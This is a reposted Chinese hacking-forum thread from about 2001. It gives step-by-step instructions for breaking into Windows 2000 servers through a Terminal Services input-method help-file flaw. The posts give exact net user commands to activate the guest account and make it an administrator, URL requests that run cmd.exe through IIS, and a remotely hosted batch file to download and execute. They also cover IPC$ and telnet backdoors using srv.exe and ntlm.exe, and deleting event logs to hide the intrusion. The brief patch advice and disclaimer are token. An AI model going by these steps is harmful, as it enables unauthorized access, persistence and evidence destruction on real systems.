引用:
--------------------------------------------------------------------------------

由于微软对中国产品不付责任的态度，使得安装了终端服务和全拼（^^我只在全拼下成功）的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
小女子几经周折、胆战心惊 、多次尝试 ，终于明白个中道理，不需上传任何文件成功入侵并装个后门（现在流行走后门^^）。
其过程如下：

1.扫描 3389 port 终端服务默认；
2.用终端客户端程序进行连接；
3.按ctrl+shift调出全拼输入法（其他似乎不行），点鼠标右键（如果其帮助菜单发灰，就赶快赶下家吧，人家打补丁了），点帮助，点输入法入门；
4.在"选项"菜单上点右键--->跳转到URL"，输入：c:\winnt\system32\cmd.exe.（如果不能确定NT系统目录，则输入：c:\ 或d:\ ……进行查找确定）；
5.选择"保存到磁盘" 选择目录：c:\inetpub\scripts\，因实际上是对方服务器上文件自身的复制操作，所以这个过程很快就会完成；
6.打开IE，输入：http://ip/scripts/cmd.exe?/c dir 怎么样？有cmd.exe文件了吧？这我们就完成了第一步；
7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下：

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL"，输入：c:\inetpub\scripts\go.bat --->在磁盘当前位置执行；
12.呵呵，大功告成啦，这样我们就激活了服务器的geust帐户，密码为：elise，超级用户呢！ （我喜欢guest而不是建立新帐户，这样似乎不易被发现些），这样你就可用IPC$连接，想怎样做就怎样做了，当然，你也可用guest直接登陆到他的服务器，到他机器上去跳舞吧：）

注意事项：
1.当你用终端客户端程序登陆到他的服务器时，你的所有操作不会在他的机器上反应出来，但如果他正打开了终端服务管理器，你就惨了了：（这时他能看到你所打开的进程id、程序映象，你的ip及机器名，并能发消息给你！
2.当你连接时，会加重对方服务器的负荷，非常容易造成对方死机和断线，所以你的操作快点为妙，小女子为此不知浪费了多少的网费和精力。
3.尽快做好后门，暂时不要上传任何程序，一是防止断线，二是防止对方打上补丁！小女子可就这样吃亏过一次，上传木马中断没有完成，第二天，人家已打上补丁，再也无法进入！并且还留下了xxxx……：（

个人观点：
1.在IE下，所拥有的只是iusr_machine权限，因而，你不要设想去做越权的事情，如启动telnet、木马等；
2.url的跳转下，你将拥有超级用户的权限，好好利用吧：）
3.跳转到哪个目录下，通常只能查看、执行当前目录的文件，不能进入到子目录，如想进入，再跳一次吧！：）
4.此法似乎与对方的防火墙无关哦！

堵漏办法：
1.打补丁；
2.删掉全拼输入法，用标准就成了嘛^^；
3.服务中关掉：Terminal Services，服务名称：TermService，对应程序名：system32\termsrv.exe；（如果哪天你潜入服务器，发现了termsrv.exe文件，而又没探测到3389端口，你知道该怎样做了吧？^^）

问题（高手请赐教）：
1.如果IE下的www访问需要密码，怎办？
2.如果对方不开www服务怎办？我试过了直接跳转url:net user hack elise /add命令，不能成功！
3.如果对方139 port不开，有什么办法打开吗？w2k server中怎样控制139端口？

88了，小女子要走了，衷心希望各位高手、Cool GG不要对小女子保守哦，没人帮助的自学好艰苦！：（（

Homepage;elise.51.net mailto:forelise@263.net QQ:[7175215]

[被 elise 编辑过（日期 02-06-2001）]
——————————
我黑故我在……

------------------------------------------------------------------------------------

在ELISE的帖子中有一段：
1.跳至url:\winnt\system32 (系统目录在跳至url上已显示出来啦！！)
2.选中net.exe文件，点右键--->创建快键方式--->在快捷方式下点右键--->快捷方式的目标后加入:user guest /active:yes ，其他的不用再说了吧：）
我试了一下发现很多服务器都没有把GUEST加入到ADMIN组~而当你激活了GUEST后还是无法访问对方电脑的，俺补充一点点确保新手可以成功~
net user guest /active:yes 激活GUEST用户net user guest 123 为GUEST重新设置密码：123
net localgroup administrators guest /add
将GUEST加入ADMINISTRATOR组~
但为了避免服务器被坏人利用请进入后通知管理人员，或者禁止GUEST，把密码加难。

\SYSTEM32\LOGFILES\*.EVT

--------------------------------------------------------------------------------

现在把本人的方法写出来和大家分享。

其实只要把上面提到的BAT文件，用FTP发送到一个主页上（我的主页上就有一个，下载的地址是“http://go2.163.com/~tomylee/hack/tomy.bat/”）。然后用WIN2K登陆——换到全拼状态——右键——帮助——输入法入门——在选项菜单上点右键——跳转到URL——然后就是把http://go2.163.com/~tomylee/hack/tomy.bat/写到URL里面，接下来会出现下载的提示框，先“在当前位置打开该程序”，然后？呵呵，便是击活“GUEST”用户。下一步是什么？

老大你是在那里抄的啊?

原文是别人的，但那个.bat文件却是我和悟休在讨论中无意间发现的……（当时3389才刚被发现N多的机子没打补丁，其实现在还是有N多的机子没打）。

...............................

看看这个教程!是我在鹰派四川站发现的!

注：本文目的在于提醒网管注意，加强网管网络安全意识，提高网管网络安全技术水平，并不赞同用此法进行违法犯罪活动。

WIN2000中文简体版存在的输入法漏洞，可以使本地用户绕过身分验证机制进入系统内部。经实验，WIN2000中文简体版的终端服务，在远程操作时仍然存在这一漏洞，而且危害更大。
WIN2000的终端服务功能，能使系统管理员对WIN2000进行远程操作，采用的是图形界面，能使用户在远程控制计算机时功能与在本地使用一样，其默认端口为3389，用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。
工具：客户端连接管理器，下载地址：http://minisql.51.net/rj/WIN.zip，端口扫描器一个，推荐使用：流光、网络刺客2、superscan。
入侵步骤：
一，获得管理员账号。
我们先对一个网段进行扫描，扫描端口设为3389，运行客户端连接管理器，将扫描到的任一地址加入到，设置好客户端连接管理器，然后与服务器连结。几秒钟后，屏幕上显示出WIN2000登录界面（如果发现是英文或繁体中文版，放弃，另换一个地址），用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。用右键点击状态条上的微软徽标，弹出“帮助”（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞），打开“帮助”一栏中“操作指南”，在最上面的任务栏点击右键，会弹出一个菜单，打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如，该系统安装在Ｃ盘上，就在空白栏中填入"c:\winnt\system32"。然后按“确定”，于是我们就成功地绕过了身份验证，进入了系统的SYSTEM32目录。
现在我们要获得一个账号，成为系统的合法用户。在该目录下找到"net.exe"，为"net.exe"创建一个快捷方式，右键点击该快捷方式，在“属性”－>“目标”－>c:\winnt\system32\net.exe后面空一格，填入"user guest /active :yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户，当然也可以利用"user 用户名密码 ／add"，创建一个新账号，但容易引起网管怀疑。运行该快捷方式，此时你不会看到运行状态，但guest用户已被激活。然后又修改该快捷方式，填入"user guest 密码"，运行，于是guest便有了密码。最后，再次修改，填入“localgroup administrators guest /add，将guest变成系统管理员。
注意事项：1、在这过程中，如果对方管理员正在使用终端服务管理器，他将看到你所打开的进程id，你的ip和机器名，甚至能够给你发送消息。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间，在这一分钟内如果你不能完成上述操作，你只能再连结。
3、你所看到的图像与操作会有所延迟，这受网速的影响。
4、你以管理员身份登录上去之后，事件查看器里的安全日志会记录你的用户名、上网IP、客户机名，因些，在退出时务必删除日志。

二，创建跳板。(需要在NT上操作）
再次登录终端用务器，以"guest"身份进入，此时guest已是系统管理员，已具备一切可执行权。打开“控制面板”，进入“网络和拔号连接”，在“本地连接”或“拔号连接”中查看属性，看对方是否选择“Microsoft 网络的文件和打印机共享”，如果没有，就打上勾。对方如果使用的是拔号上网，下次拔号网络共享才会打开。
退出对方系统，在本地机命令提示符下，输入
net use \\IP Address\IPC$ ["password"] /user:"guset"，通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去（小榕流光安装目录下的Tools目录里的Srv.exe,另外，还有ntml.xex，一会要用），这个程序是在对方上面开一个Telnet服务，端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$
然后利用定时服务启动它，先了解对方的时间：
net time \\***.***.***.***
显示：
\\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55
命令成功完成。
然后启动srv.exe:
at \\***.***.***.*** 09:00 srv.exe　
显示：
新加了一项作业，其作业 ID = 0
过几分钟后，telnet ***.***.***.*** 99
这里不需要验证身份，直接登录，显示：
c:\winnt:\system32>
我们就成功登陆上去了。然后又在本地打开命令提示符，另开一个窗口，输入：
copy c:\hack\ntlm.exe \\211.21.193.202\admin$
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口，运行ntlm.exe
C:\WINNT\system32>ntlm
显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
C:\WINNT\system32>
好，现在我们来启动WIN2000本身的telnet，首先终止srv.exe的telnet服务：
net stop telnet　系统告诉你并没有启动telnet，不理它，继续：
net start telnet　这次真的启动了telnet，我们可以在另开的命令提示符窗口telnet到对方的
23端口，验证身份，输入我们的guest账号和密码，它就真正成为我们的跳板了。我们可以利用它到其它的主机去。
三、扫除脚印：
删除为net.exe 创建的快捷方式，删除winnt\system32\logfiles下边的日志文件

补漏方法：
1、打补丁
2、删除输入法帮助文件
3、停止终端服务。

作者：wps2000

(转载)